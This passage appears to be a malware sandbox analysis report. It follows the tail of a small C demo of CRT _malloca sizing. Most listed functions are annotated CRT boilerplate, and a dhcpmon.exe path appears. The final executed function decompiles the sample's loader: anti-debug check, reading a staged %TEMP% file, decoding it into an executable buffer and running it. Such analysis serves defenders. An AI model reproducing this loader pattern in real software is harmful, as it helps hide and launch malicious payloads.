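    unsigned small_marker = crt_malloca_marker_of(small);
    int small_freed = crt_freea(small);
    printf("stack block: marker 0x%04X, free() called=%d\n", small_marker, small_freed);

    /* Large request: the heap branch. */
    uint16_t *large = crt_malloca_heap_wchars(4096);
    unsigned large_marker = large ? crt_malloca_marker_of(large) : 0u;
    int large_freed = crt_freea(large);
    printf("heap block:  marker 0x%04X, free() called=%d\n", large_marker, large_freed);

    /* A count whose doubled size plus 8 wraps past 32 bits collapses to 0. */
    printf("overflowed request -> size %u\n", crt_malloca_size_for_wchars(0x7FFFFFFCu));
    return 0;
}
```

Any C99 compiler builds it; the program prints the marker of a stack block and of a heap block and shows the size collapsing to 0 for a request that wraps 32 bits. On the real CRT the stack branch is _alloca in the caller's frame, which a helper function cannot reproduce, so the example marks a caller-provided array instead.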

            C-Code - Quality: 72%
            			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
            				signed int _v8;
            				signed char _v15;
            				char _v16;
            				void _v24;
            				short _v28;
            				char _v31;
            				void _v32;
            				long _v36;
            				intOrPtr _v40;
            				void* _v44;
            				signed int _v48;
            				signed char* _v52;
            				long _v56;
            				int _v60;
            				void* __ebx;
            				signed int _t78;
            				signed int _t80;
            				int _t86;
            				void* _t93;
            				long _t96;
            				void _t104;
            				void* _t111;
            				signed int _t115;
            				signed int _t118;
            				signed char _t123;
            				signed char _t128;
            				intOrPtr _t129;
            				signed int _t131;
            				signed char* _t133;
            				intOrPtr* _t136;
            				signed int _t138;
            				void* _t139;
            
            				_t78 =  *0x412014; // 0x9573097c
            				_v8 = _t78 ^ _t138;
            				_t80 = _a8;
            				_t118 = _t80 >> 6;
            				_t115 = (_t80 & 0x0000003f) * 0x30;
            				_t133 = _a12;
            				_v52 = _t133;
            				_v48 = _t118;
            				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
            				_v40 = _a16 + _t133;
            				_t86 = GetConsoleCP();
            				_t136 = _a4;
            				_v60 = _t86;
            				 *_t136 = 0;
            				 *((intOrPtr*)(_t136 + 4)) = 0;
            				 *((intOrPtr*)(_t136 + 8)) = 0;
            				while(_t133 < _v40) {
            					_v28 = 0;
            					_v31 =  *_t133;
            					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
            					_t123 =  *(_t129 + _t115 + 0x2d);
            					if((_t123 & 0x00000004) == 0) {
            						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
            							_push(1);
            							_push(_t133);
            							goto L8;
            						} else {
            							if(_t133 >= _v40) {
            								_t131 = _v48;
            								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
            								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
            								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
            							} else {
            								_t111 = E00407222( &_v28, _t133, 2);
            								_t139 = _t139 + 0xc;
            								if(_t111 != 0xffffffff) {
            									_t133 =  &(_t133[1]);
            									goto L9;
            								}
            							}
            						}
            					} else {
            						_t128 = _t123 & 0x000000fb;
            						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
            						_push(2);
            						_v15 = _t128;
            						 *(_t129 + _t115 + 0x2d) = _t128;
            						_push( &_v16);
            						L8:
            						_push( &_v28);
            						_t93 = E00407222();
            						_t139 = _t139 + 0xc;
            						if(_t93 != 0xffffffff) {
            							L9:
            							_t133 =  &(_t133[1]);
            							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
            							_v56 = _t96;
            							if(_t96 != 0) {
            								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
            									L19:
            									 *_t136 = GetLastError();
            								} else {
            									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
            									if(_v36 >= _v56) {
            										if(_v31 != 0xa) {
            											goto L16;
            										} else {
            											_t104 = 0xd;
            											_v32 = _t104;
            											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
            												goto L19;
            											} else {
            												if(_v36 >= 1) {
            													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
            													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
            													goto L16;
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            					goto L20;
            					L16:
            				}
            				L20:
            				E004018CC();
            				return _t136;
            			}

            Instruction addresses (per-line address column of the decompiler view): 0x0040822b to 0x004083d5

            APIs
            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
            • __fassign.LIBCMT ref: 004082E0
            • __fassign.LIBCMT ref: 004082FB
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
            • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
            • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
            • String ID:
            • API String ID: 1324828854-0
            • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
            • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
            • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
            • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 27%
            			E00403632(void* __ecx, intOrPtr _a4) {
            				signed int _v8;
            				signed int _v12;
            				signed int _t10;
            				int _t12;
            				int _t18;
            				signed int _t20;
            
            				_t10 =  *0x412014; // 0x9573097c
            				_v8 = _t10 ^ _t20;
            				_v12 = _v12 & 0x00000000;
            				_t12 =  &_v12;
            				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
            				if(_t12 != 0) {
            					_t12 = GetProcAddress(_v12, "CorExitProcess");
            					_t18 = _t12;
            					if(_t18 != 0) {
            						E0040C15C();
            						_t12 =  *_t18(_a4);
            					}
            				}
            				if(_v12 != 0) {
            					_t12 = FreeLibrary(_v12);
            				}
            				E004018CC();
            				return _t12;
            			}

            Instruction addresses (per-line address column of the decompiler view): 0x00403639 to 0x0040369b

            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
            • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
            Strings
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
            • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
            • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
            • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 79%
            			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
            				signed int _v8;
            				int _v12;
            				char _v16;
            				intOrPtr _v24;
            				char _v28;
            				void* _v40;
            				void* __ebx;
            				void* __edi;
            				signed int _t34;
            				signed int _t40;
            				int _t45;
            				int _t52;
            				void* _t53;
            				void* _t55;
            				int _t57;
            				signed int _t63;
            				int _t67;
            				short* _t71;
            				signed int _t72;
            				short* _t73;
            
            				_t34 =  *0x412014; // 0x9573097c
            				_v8 = _t34 ^ _t72;
            				_push(_t53);
            				E00403F2B(_t53,  &_v28, __edx, _a4);
            				_t57 = _a24;
            				if(_t57 == 0) {
            					_t52 =  *(_v24 + 8);
            					_t57 = _t52;
            					_a24 = _t52;
            				}
            				_t67 = 0;
            				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
            				_v12 = _t40;
            				if(_t40 == 0) {
            					L15:
            					if(_v16 != 0) {
            						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
            					}
            					E004018CC();
            					return _t67;
            				}
            				_t55 = _t40 + _t40;
            				_t17 = _t55 + 8; // 0x8
            				asm("sbb eax, eax");
            				if((_t17 & _t40) == 0) {
            					_t71 = 0;
            					L11:
            					if(_t71 != 0) {
            						E00402460(_t67, _t71, _t67, _t55);
            						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
            						if(_t45 != 0) {
            							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
            						}
            					}
            					L14:
            					E004063D5(_t71);
            					goto L15;
            				}
            				_t20 = _t55 + 8; // 0x8
            				asm("sbb eax, eax");
            				_t47 = _t40 & _t20;
            				_t21 = _t55 + 8; // 0x8
            				_t63 = _t21;
            				if((_t40 & _t20) > 0x400) {
            					asm("sbb eax, eax");
            					_t71 = E00403E3D(_t63, _t47 & _t63);
            					if(_t71 == 0) {
            						goto L14;
            					}
            					 *_t71 = 0xdddd;
            					L9:
            					_t71 =  &(_t71[4]);
            					goto L11;
            				}
            				asm("sbb eax, eax");
            				E004018E0();
            				_t71 = _t73;
            				if(_t71 == 0) {
            					goto L14;
            				}
            				 *_t71 = 0xcccc;
            				goto L9;
            			}

            Instruction addresses (per-line address column of the decompiler view): 0x004062c0 to 0x004063d4

            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
            • __alloca_probe_16.LIBCMT ref: 0040633D
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
            • __freea.LIBCMT ref: 004063A9
              • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
            • String ID:
            • API String ID: 313313983-0
            • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
            • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
            • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
            • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00409BDD(void* __eflags, signed int _a4) {
            				intOrPtr _t13;
            				void* _t21;
            				signed int _t33;
            				long _t35;
            
            				_t33 = _a4;
            				if(E00405D6E(_t33) != 0xffffffff) {
            					_t13 =  *0x4130a0; // 0x6d7b68
            					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
            						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
            							goto L7;
            						} else {
            							goto L6;
            						}
            					} else {
            						L6:
            						_t21 = E00405D6E(2);
            						if(E00405D6E(1) == _t21) {
            							goto L1;
            						}
            						L7:
            						if(CloseHandle(E00405D6E(_t33)) != 0) {
            							goto L1;
            						}
            						_t35 = GetLastError();
            						L9:
            						E00405CDD(_t33);
            						 *((char*)( *((intOrPtr*)(0x4130a0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
            						if(_t35 == 0) {
            							return 0;
            						}
            						return E004047FB(_t35) | 0xffffffff;
            					}
            				}
            				L1:
            				_t35 = 0;
            				goto L9;
            			}

            APIs
            • CloseHandle.KERNEL32(00000000,00000000,?,?,00409AFB,?), ref: 00409C33
            • GetLastError.KERNEL32(?,00409AFB,?), ref: 00409C3D
            • __dosmaperr.LIBCMT ref: 00409C68
            Strings
            Memory Dump Source
            • Source File: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CloseErrorHandleLast__dosmaperr
            • String ID: h{m
            • API String ID: 2583163307-1179516498
            • Opcode ID: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
            • Instruction ID: 87f0d20415a4ba4edce453f192d75aa6f60acf784ef8f37888f2bef7d94c0d71
            • Opcode Fuzzy Hash: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
            • Instruction Fuzzy Hash: 12014832A0815056E2242735A989B6F77C9DB82B34F28013FF809B72C3DE389C82919C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			// CRT, not sample logic: matches UCRT try_get_module (winapi_thunks). Loads the module named in the table at
            			// 0x40cd48 with LOAD_LIBRARY_SEARCH_SYSTEM32 (0x800), retrying without flags when the OS rejects the flag with
            			// ERROR_INVALID_PARAMETER (0x57); the resulting handle (or -1 on failure) is cached at 0x412fc8.
            			E00405751(signed int _a4) {
            				signed int _t9;
            				void* _t13;
            				signed int _t15;
            				WCHAR* _t22;
            				signed int _t24;
            				signed int* _t25;
            				void* _t27;
            
            				_t9 = _a4;
            				_t25 = 0x412fc8 + _t9 * 4;
            				_t24 =  *_t25;
            				if(_t24 == 0) {
            					_t22 =  *(0x40cd48 + _t9 * 4);
            					_t27 = LoadLibraryExW(_t22, 0, 0x800);
            					if(_t27 != 0) {
            						L8:
            						 *_t25 = _t27;
            						if( *_t25 != 0) {
            							FreeLibrary(_t27);
            						}
            						_t13 = _t27;
            						L11:
            						return _t13;
            					}
            					_t15 = GetLastError();
            					if(_t15 != 0x57) {
            						_t27 = 0;
            					} else {
            						_t15 = LoadLibraryExW(_t22, _t27, _t27);
            						_t27 = _t15;
            					}
            					if(_t27 != 0) {
            						goto L8;
            					} else {
            						 *_t25 = _t15 | 0xffffffff;
            						_t13 = 0;
            						goto L11;
            					}
            				}
            				_t4 = _t24 + 1; // 0x9573097d
            				asm("sbb eax, eax");
            				return  ~_t4 & _t24;
            			}

            APIs
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
            • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID:
            • API String ID: 3177248105-0
            • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
            • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
            • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
            • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 71%
            			// CRT, not sample logic: matches UCRT __acrt_getptd (per-thread data block of 0x364 bytes held in an FLS slot;
            			// FlsSetValue appears in the call chains above). The code after the int3 is the adjacent __acrt_getptd_noexit,
            			// which returns 0 instead of calling _abort; the decompiler merged both into one function.
            			E00404320(void* __ebx, void* __ecx, void* __edx) {
            				void* __edi;
            				void* __esi;
            				intOrPtr _t2;
            				void* _t3;
            				void* _t4;
            				intOrPtr _t9;
            				void* _t11;
            				void* _t20;
            				void* _t21;
            				void* _t23;
            				void* _t25;
            				void* _t27;
            				void* _t29;
            				void* _t31;
            				void* _t32;
            				long _t36;
            				long _t37;
            				void* _t40;
            
            				_t29 = __edx;
            				_t23 = __ecx;
            				_t20 = __ebx;
            				_t36 = GetLastError();
            				_t2 =  *0x412064; // 0xffffffff
            				_t42 = _t2 - 0xffffffff;
            				if(_t2 == 0xffffffff) {
            					L2:
            					_t3 = E00403ECE(_t23, 1, 0x364);
            					_t31 = _t3;
            					_pop(_t25);
            					if(_t31 != 0) {
            						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
            						__eflags = _t4;
            						if(_t4 != 0) {
            							E00404192(_t25, _t31, 0x4132a4);
            							E00403E03(0);
            							_t40 = _t40 + 0xc;
            							__eflags = _t31;
            							if(_t31 == 0) {
            								goto L9;
            							} else {
            								goto L8;
            							}
            						} else {
            							_push(_t31);
            							goto L4;
            						}
            					} else {
            						_push(_t3);
            						L4:
            						E00403E03();
            						_pop(_t25);
            						L9:
            						SetLastError(_t36);
            						E00403E8B(_t20, _t29, _t31, _t36);
            						asm("int3");
            						_push(_t20);
            						_push(_t36);
            						_push(_t31);
            						_t37 = GetLastError();
            						_t21 = 0;
            						_t9 =  *0x412064; // 0xffffffff
            						_t45 = _t9 - 0xffffffff;
            						if(_t9 == 0xffffffff) {
            							L12:
            							_t32 = E00403ECE(_t25, 1, 0x364);
            							_pop(_t27);
            							if(_t32 != 0) {
            								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
            								__eflags = _t11;
            								if(_t11 != 0) {
            									E00404192(_t27, _t32, 0x4132a4);
            									E00403E03(_t21);
            									__eflags = _t32;
            									if(_t32 != 0) {
            										goto L19;
            									} else {
            										goto L18;
            									}
            								} else {
            									_push(_t32);
            									goto L14;
            								}
            							} else {
            								_push(_t21);
            								L14:
            								E00403E03();
            								L18:
            								SetLastError(_t37);
            							}
            						} else {
            							_t32 = E00405878(_t25, _t45, _t9);
            							if(_t32 != 0) {
            								L19:
            								SetLastError(_t37);
            								_t21 = _t32;
            							} else {
            								goto L12;
            							}
            						}
            						return _t21;
            					}
            				} else {
            					_t31 = E00405878(_t23, _t42, _t2);
            					if(_t31 != 0) {
            						L8:
            						SetLastError(_t36);
            						return _t31;
            					} else {
            						goto L2;
            					}
            				}
            			}

            APIs
            • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
            • _abort.LIBCMT ref: 0040439E
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: ErrorLast$_abort
            • String ID:
            • API String ID: 88804580-0
            • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
            • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
            • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
            • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			// vcruntime, not sample logic: __vcrt_initialize (pure-call handler, WinAPI thunks, locks); see the API list below.
            			E004025BA() {
            				void* _t4;
            				void* _t8;
            
            				E00402AE5();
            				E00402A79();
            				if(E004027D9() != 0) {
            					_t4 = E0040278B(_t8, __eflags);
            					__eflags = _t4;
            					if(_t4 != 0) {
            						return 1;
            					} else {
            						E00402815();
            						goto L1;
            					}
            				} else {
            					L1:
            					return 0;
            				}
            			}

            APIs
            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
              • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
            • String ID:
            • API String ID: 1761009282-0
            • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
            • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
            • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
            • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 87%
            			// CRT, not sample logic: wide command-line/argv setup (GetModuleFileNameW into the buffer at 0x412bf8, then argv
            			// parsing); the errno values 0x16 (EINVAL) and 0xc (ENOMEM) are stored through the errno accessor E00404831.
            			E00402E79(intOrPtr _a4) {
            				signed int _v8;
            				void* _v12;
            				char _v16;
            				intOrPtr* _t35;
            				struct HINSTANCE__* _t36;
            				struct HINSTANCE__* _t42;
            				intOrPtr* _t43;
            				intOrPtr* _t44;
            				WCHAR* _t48;
            				struct HINSTANCE__* _t49;
            				struct HINSTANCE__* _t53;
            				intOrPtr* _t56;
            				struct HINSTANCE__* _t61;
            				intOrPtr _t62;
            
            				if(_a4 == 2 || _a4 == 1) {
            					GetModuleFileNameW(0, 0x412bf8, 0x104);
            					_t48 =  *0x412e7c; // 0x6c1c14
            					 *0x412e80 = 0x412bf8;
            					if(_t48 == 0 ||  *_t48 == 0) {
            						_t48 = 0x412bf8;
            					}
            					_v8 = 0;
            					_v16 = 0;
            					E00402F98(_t48, 0, 0,  &_v8,  &_v16);
            					_t61 = E0040311E(_v8, _v16, 2);
            					if(_t61 != 0) {
            						E00402F98(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
            						if(_a4 != 1) {
            							_v12 = 0;
            							_push( &_v12);
            							_t49 = E00404D5E(_t61);
            							if(_t49 == 0) {
            								_t56 = _v12;
            								_t53 = 0;
            								_t35 = _t56;
            								if( *_t56 == 0) {
            									L15:
            									_t36 = 0;
            									 *0x412e6c = _t53;
            									_v12 = 0;
            									_t49 = 0;
            									 *0x412e74 = _t56;
            									L16:
            									E00403E03(_t36);
            									_v12 = 0;
            									goto L17;
            								} else {
            									goto L14;
            								}
            								do {
            									L14:
            									_t35 = _t35 + 4;
            									_t53 =  &(_t53->i);
            								} while ( *_t35 != 0);
            								goto L15;
            							}
            							_t36 = _v12;
            							goto L16;
            						}
            						 *0x412e6c = _v8 - 1;
            						_t42 = _t61;
            						_t61 = 0;
            						 *0x412e74 = _t42;
            						goto L10;
            					} else {
            						_t43 = E00404831();
            						_push(0xc);
            						_pop(0);
            						 *_t43 = 0;
            						L10:
            						_t49 = 0;
            						L17:
            						E00403E03(_t61);
            						return _t49;
            					}
            				} else {
            					_t44 = E00404831();
            					_t62 = 0x16;
            					 *_t44 = _t62;
            					E00404639();
            					return _t62;
            				}
            			}

            APIs
            • GetModuleFileNameW.KERNEL32(00000000,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,00000104), ref: 00402EB4
            Strings
            Memory Dump Source
            • Source File: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FileModuleName
            • String ID: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe$Nl
            • API String ID: 514040917-1399274662
            • Opcode ID: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
            • Instruction ID: f3d78f03607b51ffb72bb6c03706454bab976d361db7ab759f67f4c6569d847e
            • Opcode Fuzzy Hash: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
            • Instruction Fuzzy Hash: 9631C471A00219AFCB21DF99DA8899FBBBCEF84744B10407BF804A72C0D6F44E41DB98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			// CRT, not sample logic: caches the raw command line (0x412e78 narrow, 0x412e7c wide) for the CRT's argv parsing.
            			E00405575() {
            
            				 *0x412e78 = GetCommandLineA();
            				 *0x412e7c = GetCommandLineW();
            				return 1;
            			}

            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CommandLine
            • String ID: @3l
            • API String ID: 3253501508-1068768401
            • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
            • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
            • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
            • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
            Uniqueness

            Uniqueness Score: -1.00%

            Executed Functions

            C-Code - Quality: 82%
            			// Sample logic, not CRT: entry of the module mapped at 6F650000. Reads a staged file from %TEMP%,
            			// decodes it in place in an RWX buffer and calls it (see the line comments below).
            			E6F651000() {
            				long _v8;
            				short _v528;
            				long _t12;
            				void* _t16;
            				signed char _t23;
            				void* _t35;
            				long _t38;
            
            				_v8 = 0;
            				if(IsDebuggerPresent() != 0) {
            					DebugBreak(); // anti-analysis: with a debugger attached, raise a breakpoint exception rather than continue
            				}
            				_t12 = GetTempPathW(0x103,  &_v528);
            				if(_t12 != 0) {
            					lstrcatW( &_v528, L"\\ks446tcfy17w7jqy3r"); // staged payload path: %TEMP%\ks446tcfy17w7jqy3r
            					_t16 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0); // executed; GENERIC_READ, FILE_SHARE_READ|WRITE|DELETE, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL
            					_t35 = _t16;
            					if(_t35 == 0xffffffff) {
            						L12:
            						return _t16;
            					}
            					_t16 = GetFileSize(_t35, 0);
            					_t38 = _t16;
            					if(_t38 == 0xffffffff) {
            						L11:
            						goto L12;
            					}
            					_t16 = VirtualAlloc(0, _t38, 0x3000, 0x40); // executed; MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE: one RWX buffer the size of the file
            					 *0x6f653000 = _t16; // buffer pointer kept in a global so the decode loop and the final call can reach it
            					if(_t16 == 0) {
            						goto L11;
            					}
            					_t16 = ReadFile(_t35, _t16, _t38,  &_v8, 0); // executed
            					if(_t16 == 0) {
            						goto L11;
            					}
            					_t23 = 0;
            					if(_v8 <= 0) {
            						L10:
            						_t16 =  *0x6f653000(); // executed; calls offset 0 of the decoded buffer, i.e. position-independent code, not a PE
            						goto L11;
            					}
            					do {
            						asm("rol cl, 0x2"); // part of the per-byte transform that the decompiler could not fold into the expression below
            						 *((char*)( *0x6f653000 + _t23)) = (0x00000082 - (( !( *((intOrPtr*)( *0x6f653000 + _t23)) + 0x00000003 ^ 0x0000006a) ^ 0x000000e1) - _t23 ^ _t23) ^ 0x00000068) - 1 + _t23; // in-place decode; '!' is the decompiler's rendering of a bitwise NOT
            						_t23 = _t23 + 1;
            					} while (_t23 < _v8);
            					goto L10;
            				}
            				return _t12;
            			}

            APIs
            • IsDebuggerPresent.KERNEL32 ref: 6F651010
